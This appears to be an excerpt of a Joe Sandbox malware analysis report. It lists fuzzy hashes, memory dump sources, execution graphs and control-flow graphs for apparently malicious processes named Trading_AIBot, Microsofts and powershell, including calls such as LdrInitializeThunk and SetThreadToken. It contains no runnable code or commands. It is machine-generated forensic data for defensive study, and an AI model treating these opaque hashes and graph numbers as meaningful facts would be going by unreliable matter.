                                                                                                                              • Instruction ID: 464ab71ba150af791e82c237967cb3fc3e70762d4a2a1c862ed391976529a3ea
                                                                                                                              • Opcode Fuzzy Hash: ec6b01a710056b7ae0645e9608304b01ccd4b3c77407cd1280e6dea0248b0eba
                                                                                                                              • Instruction Fuzzy Hash: 5AE022B1908289EFDB10EFB0DA15B9D7B71EB02205F0040AED406A7252EB711F08DB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: af11611436bcbefa1b3608729a143c10c32fb3c7aefaa6f3170ed0c3f6d8709e
                                                                                                                              • Instruction ID: cac0ba04f764bb119a208ca76fa27d848384d07462917a5c796a02d8756ae30e
                                                                                                                              • Opcode Fuzzy Hash: af11611436bcbefa1b3608729a143c10c32fb3c7aefaa6f3170ed0c3f6d8709e
                                                                                                                              • Instruction Fuzzy Hash: 22E0EDB89002049FC748EF68D544A5DBBB0FB49301F1041A9D80897361E7309D46CB51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5abf1df14ed1b478fa107587932000a50d478790605235a828aa9a5f28297cc3
                                                                                                                              • Instruction ID: dff0441bfd8fbd9117a02bf2c48e3554e146b37a3a7864685f4ea869bf98f089
                                                                                                                              • Opcode Fuzzy Hash: 5abf1df14ed1b478fa107587932000a50d478790605235a828aa9a5f28297cc3
                                                                                                                              • Instruction Fuzzy Hash: 8FE0267190010CEFDB00EFB4D605B5DB7B8EB01304F0041ADD405A3210DB311E04DB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c8a90b3b0b9bb0598ef1f9904efde38664b08683248f6e58f0ead212b23a1534
                                                                                                                              • Instruction ID: b4b020246d950ef2d4560224067ab2e4bce9e324af1d43b88626b2f4a1306bc1
                                                                                                                              • Opcode Fuzzy Hash: c8a90b3b0b9bb0598ef1f9904efde38664b08683248f6e58f0ead212b23a1534
                                                                                                                              • Instruction Fuzzy Hash: F9D02B718093C24BD7269B31190C758BF30D703109F0600CBD4505B063D7141449CBA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 31ec39f8719b621852239f5a1e75019497a67457cbf9ba1bffcd2cf13b60b322
                                                                                                                              • Instruction ID: c2b8a69ef4c5909959b81c65466d58c03231603587ba4b97fb5cd3daee4914b6
                                                                                                                              • Opcode Fuzzy Hash: 31ec39f8719b621852239f5a1e75019497a67457cbf9ba1bffcd2cf13b60b322
                                                                                                                              • Instruction Fuzzy Hash: CEC0223080E008CAE3124F0AA82A378F6CCE701326F0C228E880822304921500002209
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 091dad3e675796c0a16dabc094873a9d64a616a54e5e23ff6b9c8f68d6f04644
                                                                                                                              • Instruction ID: f2e29e06df70c8403df26d3215cb85f6ed9146cb9b2d8ac78e1c429d2a7e4251
                                                                                                                              • Opcode Fuzzy Hash: 091dad3e675796c0a16dabc094873a9d64a616a54e5e23ff6b9c8f68d6f04644
                                                                                                                              • Instruction Fuzzy Hash: F4C080F08003089BD714FFB5A804B1DB7BCE706217F00016DF51853100D7715840D6BA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52b4467ccf57fe481461f2427e6b26b273a27bdcefa1facdd9c3c494840a4545
                                                                                                                              • Instruction ID: 532f407c7432ec9843ef5fe4734376f8d9b1481d1aef23eaeadd17f09f0c4f97
                                                                                                                              • Opcode Fuzzy Hash: 52b4467ccf57fe481461f2427e6b26b273a27bdcefa1facdd9c3c494840a4545
                                                                                                                              • Instruction Fuzzy Hash: 67C080B0C05348DBC324DFA5A404F1DB77CE702306F40016DE91853101E7714440C6F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 921ab6e0b5d2d77e3713767dd0d00d25f7e0ffef9f818ed8fbdc50ec875179aa
                                                                                                                              • Instruction ID: 570fc590cd617a0c39ad1e003662c8b330d632ea330e163afb23e5fb39ace7af
                                                                                                                              • Opcode Fuzzy Hash: 921ab6e0b5d2d77e3713767dd0d00d25f7e0ffef9f818ed8fbdc50ec875179aa
                                                                                                                              • Instruction Fuzzy Hash: E5A02430D1F00D430F31D40014515F0770C401731575015DCFC4C331175143C03100DC

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:20.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:10%
                                                                                                                              Total number of Nodes:40
                                                                                                                              Total number of Limit Nodes:5
                                                                                                                              execution_graph 9731 283cab0 9732 283cadd 9731->9732 9734 283e9bf 9732->9734 9736 283cde6 9732->9736 9737 283c168 9732->9737 9735 283c168 LdrInitializeThunk 9735->9736 9736->9734 9736->9735 9738 283c17a 9737->9738 9740 283c17f 9737->9740 9738->9736 9739 283c8a9 LdrInitializeThunk 9739->9738 9740->9736 9740->9738 9740->9739 9741 28346d8 9742 28346e4 9741->9742 9745 28348c9 9742->9745 9746 28348e4 9745->9746 9750 2834ef8 9746->9750 9757 2834f08 9746->9757 9747 2834713 9751 2834f2a 9750->9751 9752 2834ff6 9751->9752 9755 283c168 LdrInitializeThunk 9751->9755 9764 283c386 9751->9764 9770 283c76c 9751->9770 9776 283c158 9751->9776 9752->9747 9755->9752 9758 2834f2a 9757->9758 9759 2834ff6 9758->9759 9760 283c386 2 API calls 9758->9760 9761 283c158 2 API calls 9758->9761 9762 283c168 LdrInitializeThunk 9758->9762 9763 283c76c 2 API calls 9758->9763 9759->9747 9760->9759 9761->9759 9762->9759 9763->9759 9766 283c3b9 9764->9766 9765 283c519 9765->9752 9766->9765 9767 283c764 LdrInitializeThunk 9766->9767 9769 283c168 LdrInitializeThunk 9766->9769 9767->9765 9769->9766 9775 283c623 9770->9775 9771 283c764 LdrInitializeThunk 9773 283c8c1 9771->9773 9773->9752 9774 283c168 LdrInitializeThunk 9774->9775 9775->9771 9775->9774 9777 283c17a 9776->9777 9781 283c17f 9776->9781 9777->9752 9778 283c764 LdrInitializeThunk 9778->9777 9780 283c168 LdrInitializeThunk 9780->9781 9781->9752 9781->9777 9781->9778 9781->9780

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 979 283c168-283c178 980 283c17a 979->980 981 283c17f-283c18b 979->981 982 283c2ab-283c2b5 980->982 984 283c192-283c1a7 981->984 985 283c18d 981->985 988 283c2bb-283c2fb call 2835d08 984->988 989 283c1ad-283c1b8 984->989 985->982 1005 283c302-283c378 call 2835d08 call 2835c00 988->1005 992 283c2b6 989->992 993 283c1be-283c1c5 989->993 992->988 995 283c1f2-283c1fd 993->995 996 283c1c7-283c1de 993->996 1000 283c20a-283c214 995->1000 1001 283c1ff-283c207 995->1001 996->1005 1006 283c1e4-283c1e7 996->1006 1011 283c21a-283c224 1000->1011 1012 283c29e-283c2a3 1000->1012 1001->1000 1040 283c37a-283c385 1005->1040 1041 283c3df-283c454 call 2835ca8 1005->1041 1006->992 1010 283c1ed-283c1f0 1006->1010 1010->995 1010->996 1011->992 1016 283c22a-283c246 1011->1016 1012->982 1022 283c24a-283c24d 1016->1022 1023 283c248 1016->1023 1025 283c254-283c257 1022->1025 1026 283c24f-283c252 1022->1026 1023->982 1028 283c25a-283c268 1025->1028 1026->1028 1028->992 1033 283c26a-283c271 1028->1033 1033->982 1034 283c273-283c279 1033->1034 1034->992 1035 283c27b-283c280 1034->1035 1035->992 1037 283c282-283c295 1035->1037 1037->992 1042 283c297-283c29a 1037->1042 1040->1041 1046 283c4f3-283c4f9 1041->1046 1042->1034 1044 283c29c 1042->1044 1044->982 1047 283c459-283c46c 1046->1047 1048 283c4ff-283c517 1046->1048 1049 283c473-283c4c4 1047->1049 1050 283c46e 1047->1050 1051 283c52b-283c53e 1048->1051 1052 283c519-283c526 1048->1052 1069 283c4d7-283c4e9 1049->1069 1070 283c4c6-283c4d4 1049->1070 1050->1049 1054 283c540 1051->1054 1055 283c545-283c561 1051->1055 1053 283c8c1-283c9bf 1052->1053 1060 283c9c1-283c9c6 call 2835ca8 1053->1060 1061 283c9c7-283c9d1 1053->1061 1054->1055 1058 283c563 1055->1058 1059 283c568-283c58c 1055->1059 1058->1059 1066 283c593-283c5c5 1059->1066 1067 283c58e 1059->1067 1060->1061 1075 283c5c7 1066->1075 1076 283c5cc-283c60e 1066->1076 1067->1066 1072 283c4f0 1069->1072 1073 283c4eb 1069->1073 1070->1048 1072->1046 1073->1072 1075->1076 1078 283c610 1076->1078 1079 283c615-283c61e 1076->1079 1078->1079 1080 283c846-283c84c 1079->1080 1081 283c623-283c648 1080->1081 1082 283c852-283c865 1080->1082 1083 283c64a 1081->1083 1084 283c64f-283c686 1081->1084 1085 283c867 1082->1085 1086 283c86c-283c887 1082->1086 1083->1084 1094 283c688 1084->1094 1095 283c68d-283c6bf 1084->1095 1085->1086 1087 283c889 1086->1087 1088 283c88e-283c8a2 1086->1088 1087->1088 1092 283c8a4 1088->1092 1093 283c8a9-283c8bf LdrInitializeThunk 1088->1093 1092->1093 1093->1053 1094->1095 1097 283c723-283c736 1095->1097 1098 283c6c1-283c6e6 1095->1098 1101 283c738 1097->1101 1102 283c73d-283c762 1097->1102 1099 283c6e8 1098->1099 1100 283c6ed-283c71b 1098->1100 1099->1100 1100->1097 1101->1102 1105 283c771-283c7a9 1102->1105 1106 283c764-283c765 1102->1106 1107 283c7b0-283c811 call 283c168 1105->1107 1108 283c7ab 1105->1108 1106->1082 1114 283c813 1107->1114 1115 283c818-283c83c 1107->1115 1108->1107 1114->1115 1118 283c843 1115->1118 1119 283c83e 1115->1119 1118->1080 1119->1118
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.3376861216.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_2830000_Microsofts.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8333e7481dde593a63a2439fc5f417ac1e7c81c20f460dc740ff4105cd89c736
                                                                                                                              • Instruction ID: d183cc17662314259f7a47d9732d63afecf30e1840b25173359ddff7c64dce4a
                                                                                                                              • Opcode Fuzzy Hash: 8333e7481dde593a63a2439fc5f417ac1e7c81c20f460dc740ff4105cd89c736
                                                                                                                              • Instruction Fuzzy Hash: 62222C79E00219CFDB15DFA8C884B9DBBB2BF88304F1481AAD409E7355DB359986CF90

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1230 283c76c 1231 283c82b-283c83c 1230->1231 1232 283c843-283c84c 1231->1232 1233 283c83e 1231->1233 1235 283c623-283c648 1232->1235 1236 283c852-283c865 1232->1236 1233->1232 1237 283c64a 1235->1237 1238 283c64f-283c686 1235->1238 1239 283c867 1236->1239 1240 283c86c-283c887 1236->1240 1237->1238 1248 283c688 1238->1248 1249 283c68d-283c6bf 1238->1249 1239->1240 1241 283c889 1240->1241 1242 283c88e-283c8a2 1240->1242 1241->1242 1246 283c8a4 1242->1246 1247 283c8a9-283c8bf LdrInitializeThunk 1242->1247 1246->1247 1250 283c8c1-283c9bf 1247->1250 1248->1249 1256 283c723-283c736 1249->1256 1257 283c6c1-283c6e6 1249->1257 1252 283c9c1-283c9c6 call 2835ca8 1250->1252 1253 283c9c7-283c9d1 1250->1253 1252->1253 1261 283c738 1256->1261 1262 283c73d-283c762 1256->1262 1259 283c6e8 1257->1259 1260 283c6ed-283c71b 1257->1260 1259->1260 1260->1256 1261->1262 1265 283c771-283c7a9 1262->1265 1266 283c764-283c765 1262->1266 1267 283c7b0-283c811 call 283c168 1265->1267 1268 283c7ab 1265->1268 1266->1236 1274 283c813 1267->1274 1275 283c818-283c82a 1267->1275 1268->1267 1274->1275 1275->1231
                                                                                                                              APIs
                                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 0283C8AE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.3376861216.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_2830000_Microsofts.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 29f06e19591b7efd764a7e6004ace4c2b7a23e291537d96427c66db5ced3d8dc
                                                                                                                              • Instruction ID: c4aa153c41478cb301a7d8d96af60ed6c48bf7d0522ffde6fa84633c813cd6dd
                                                                                                                              • Opcode Fuzzy Hash: 29f06e19591b7efd764a7e6004ace4c2b7a23e291537d96427c66db5ced3d8dc
                                                                                                                              • Instruction Fuzzy Hash: 10114F7DE002099FDB15DBE8D484FADB7B5FB88309F548166E848F7245D7309942CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.3375483318.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_eed000_Microsofts.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 72b1bde513b6f135da901e32ba9e15dfb8b3a4d48d14e48e4df4cc20ac94e92a
                                                                                                                              • Instruction ID: 511d93f6ebbe43c5b96660daf1805c023fde55786e2e7316105c588959c1cae3
                                                                                                                              • Opcode Fuzzy Hash: 72b1bde513b6f135da901e32ba9e15dfb8b3a4d48d14e48e4df4cc20ac94e92a
                                                                                                                              • Instruction Fuzzy Hash: A4213771508288DFDB10DF14DDC0B16BB66FB84318F28C56DE8091B282C376D847CA61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.3375483318.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_eed000_Microsofts.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3f7273bcbcd2fe184e7a9c0132b5160c3d4c27c42dcd95522dc9215e898bd4e
                                                                                                                              • Instruction ID: ef3452d660b746dca021744c9004800fd0df6233d76e4c8cccd8731de4dfe856
                                                                                                                              • Opcode Fuzzy Hash: a3f7273bcbcd2fe184e7a9c0132b5160c3d4c27c42dcd95522dc9215e898bd4e
                                                                                                                              • Instruction Fuzzy Hash: FB212B7150D3C49FCB03DB24D990711BF71AB46214F2985EBD8898F2A7C33A985ACB62

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:6.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 20553 82b7560 20554 82b75a3 SetThreadToken 20553->20554 20555 82b75d1 20554->20555

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 214 b3b48b-b3b4a9 215 b3b4ab 214->215 216 b3b4ae-b3b7e9 call b3acbc 214->216 215->216 277 b3b7ee-b3b7f5 216->277
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: p.x%${YIr^$YIr^
                                                                                                                              • API String ID: 0-3874789119
                                                                                                                              • Opcode ID: 3c7c94333705db0c97372138624f6872d11439795df8cdfacb9165e849b52720
                                                                                                                              • Instruction ID: 8a33614d9d83f8ce2b6707e770be95070382c341ccbfb84b4bc6239e28e1077a
                                                                                                                              • Opcode Fuzzy Hash: 3c7c94333705db0c97372138624f6872d11439795df8cdfacb9165e849b52720
                                                                                                                              • Instruction Fuzzy Hash: C99152B1B006159BDB19EFB588115AFB7E3EF84B00F14892DD116AB340DF36AE069BC5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 278 b3b490-b3b4a9 279 b3b4ab 278->279 280 b3b4ae-b3b7e9 call b3acbc 278->280 279->280 341 b3b7ee-b3b7f5 280->341
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: p.x%${YIr^$YIr^
                                                                                                                              • API String ID: 0-3874789119
                                                                                                                              • Opcode ID: 9f15eb4463a6fe2c130165d904d4c8a6b802650dbd6ab700bf77ceae4a539352
                                                                                                                              • Instruction ID: 1241cadd7f2442bcce0aafed195970efa3157abe062b831e925711d7cbb68b53
                                                                                                                              • Opcode Fuzzy Hash: 9f15eb4463a6fe2c130165d904d4c8a6b802650dbd6ab700bf77ceae4a539352
                                                                                                                              • Instruction Fuzzy Hash: 2F9152B1B006159BDB19EFB588115AFB7E3EF84B00F14892DD116AB340DF36AE069BC5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2426745007.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_70c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Jk$Jk$Jk$Jk$Jk$Jk$rk$rk
                                                                                                                              • API String ID: 0-2133941804
                                                                                                                              • Opcode ID: fbe6072b557acd632cbcc2c7411b557b611c6355a51645741a49d7bc04f74b55
                                                                                                                              • Instruction ID: f820adc3c55be39cd5ad6ca70974602abcb4a5de0afc857da9996cf21191ff88
                                                                                                                              • Opcode Fuzzy Hash: fbe6072b557acd632cbcc2c7411b557b611c6355a51645741a49d7bc04f74b55
                                                                                                                              • Instruction Fuzzy Hash: 002226B1B00206DFDB61DF68C8516AE7BE6BF89210F1482BEE515DB641DB35CC41CBA2

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 342 82b755b-82b759b 344 82b75a3-82b75cf SetThreadToken 342->344 345 82b75d8-82b75f5 344->345 346 82b75d1-82b75d7 344->346 346->345
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2502099111.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_82b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadToken
                                                                                                                              • String ID: p.x%
                                                                                                                              • API String ID: 3254676861-3561632723
                                                                                                                              • Opcode ID: 46069396e0c10938b4292989cc0de31bacde320603d3df14e1370cb53beb6ab1
                                                                                                                              • Instruction ID: a437fc38e311a06606af3d7d13198a7e12247e20f56dd7709aba2ea376fb5f27
                                                                                                                              • Opcode Fuzzy Hash: 46069396e0c10938b4292989cc0de31bacde320603d3df14e1370cb53beb6ab1
                                                                                                                              • Instruction Fuzzy Hash: 201158B18003488FDB10DFAAD888BDEFFF4AF88320F14845AD419A7250D774A944CFA1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 349 82b7560-82b75cf SetThreadToken 351 82b75d8-82b75f5 349->351 352 82b75d1-82b75d7 349->352 352->351
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2502099111.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_82b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadToken
                                                                                                                              • String ID: p.x%
                                                                                                                              • API String ID: 3254676861-3561632723
                                                                                                                              • Opcode ID: ddf1933ceec2a1426561c6165287f4cc475e7d46a7da2bb20c3aa6f3cdb48c72
                                                                                                                              • Instruction ID: 5473e71e46725552c64e1ea57f108e15ceccdad5d91dd35d2031a0e3fef584a0
                                                                                                                              • Opcode Fuzzy Hash: ddf1933ceec2a1426561c6165287f4cc475e7d46a7da2bb20c3aa6f3cdb48c72
                                                                                                                              • Instruction Fuzzy Hash: A31125B59002498FDB10DF9AD884BDEFBF8AB88320F148419D519A7250D774A944CFA0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 398 b3bac0-b3bb50 402 b3bb52 398->402 403 b3bb56-b3bb61 398->403 402->403 404 b3bb63 403->404 405 b3bb66-b3bbc0 call b3af98 403->405 404->405 412 b3bbc2-b3bbc7 405->412 413 b3bc11-b3bc15 405->413 412->413 416 b3bbc9-b3bbec 412->416 414 b3bc17-b3bc21 413->414 415 b3bc26 413->415 414->415 417 b3bc2b-b3bc2d 415->417 418 b3bbf2-b3bbfd 416->418 419 b3bc52 417->419 420 b3bc2f-b3bc50 417->420 421 b3bc06-b3bc0f 418->421 422 b3bbff-b3bc05 418->422 423 b3bc5a-b3bc5e 419->423 424 b3bc55 call b3a978 419->424 420->423 421->417 422->421 426 b3bc60-b3bc89 423->426 427 b3bc97-b3bcc6 423->427 424->423 426->427
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: p.x%
                                                                                                                              • API String ID: 0-3561632723
                                                                                                                              • Opcode ID: 0f07d0d30c6764d1cecd33f5fde20844427601335fca033c6988bc6368c0f6f5
                                                                                                                              • Instruction ID: faf94a8a581767353d1a7959e4377bbd6496e7f9609cb86b9916ac9f52245135
                                                                                                                              • Opcode Fuzzy Hash: 0f07d0d30c6764d1cecd33f5fde20844427601335fca033c6988bc6368c0f6f5
                                                                                                                              • Instruction Fuzzy Hash: 8561F471E00249DFDB14DFA9D584B9DFBF1EF88310F24816AE909AB264EB349D41CB50

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 491 b3babb-b3bb50 496 b3bb52 491->496 497 b3bb56-b3bb61 491->497 496->497 498 b3bb63 497->498 499 b3bb66-b3bbc0 call b3af98 497->499 498->499 506 b3bbc2-b3bbc7 499->506 507 b3bc11-b3bc15 499->507 506->507 510 b3bbc9-b3bbec 506->510 508 b3bc17-b3bc21 507->508 509 b3bc26 507->509 508->509 511 b3bc2b-b3bc2d 509->511 512 b3bbf2-b3bbfd 510->512 513 b3bc52 511->513 514 b3bc2f-b3bc50 511->514 515 b3bc06-b3bc0f 512->515 516 b3bbff-b3bc05 512->516 517 b3bc5a-b3bc5e 513->517 518 b3bc55 call b3a978 513->518 514->517 515->511 516->515 520 b3bc60-b3bc89 517->520 521 b3bc97-b3bcc6 517->521 518->517 520->521
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: p.x%
                                                                                                                              • API String ID: 0-3561632723
                                                                                                                              • Opcode ID: 001bd05bf0788d165dd14ab5dbe185c8fde8140c2045c7ea2b97aa419b2f82d0
                                                                                                                              • Instruction ID: b76174fae819205f90de82603549ecda98c0ed8f3e559d24f467835b77ed83e2
                                                                                                                              • Opcode Fuzzy Hash: 001bd05bf0788d165dd14ab5dbe185c8fde8140c2045c7ea2b97aa419b2f82d0
                                                                                                                              • Instruction Fuzzy Hash: 8251F571E00248DFDB14DFA9D484A9DFBF5EF88310F24816AE909AB264EB349D45CB51

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 601 b393f0-b39455 604 b39457-b39468 601->604 605 b3948a-b39496 601->605 604->605 606 b394ca-b394d1 605->606 607 b39498-b394a8 605->607 608 b394d3 606->608 609 b394eb-b394f3 606->609 607->606 617 b394d8 call b39550 608->617 618 b394d8 call b39549 608->618 610 b394f5-b39518 609->610 611 b3952a-b39539 609->611 614 b39521-b39528 610->614 615 b3951a-b39520 610->615 612 b394de-b394e4 612->609 614->611 615->614 617->612 618->612
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: p.x%
                                                                                                                              • API String ID: 0-3561632723
                                                                                                                              • Opcode ID: 0f44ab9130baf8506abda6417be6183d46243b8e2f66caf8bf424c36b1c3f5a6
                                                                                                                              • Instruction ID: 8bedd9d3f0b1449845a32cc5214eb10b91e4a404fdb0d9191746d4cb59c27e88
                                                                                                                              • Opcode Fuzzy Hash: 0f44ab9130baf8506abda6417be6183d46243b8e2f66caf8bf424c36b1c3f5a6
                                                                                                                              • Instruction Fuzzy Hash: 31319C719057449EEB60DF6AD0883CAFBF2EF88320F28845AD45D9B345D6B46882CB91

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 634 b39400-b39455 636 b39457-b39468 634->636 637 b3948a-b39496 634->637 636->637 638 b394ca-b394d1 637->638 639 b39498-b394a8 637->639 640 b394d3 638->640 641 b394eb-b394f3 638->641 639->638 649 b394d8 call b39550 640->649 650 b394d8 call b39549 640->650 642 b394f5-b39518 641->642 643 b3952a-b39539 641->643 646 b39521-b39528 642->646 647 b3951a-b39520 642->647 644 b394de-b394e4 644->641 646->643 647->646 649->644 650->644
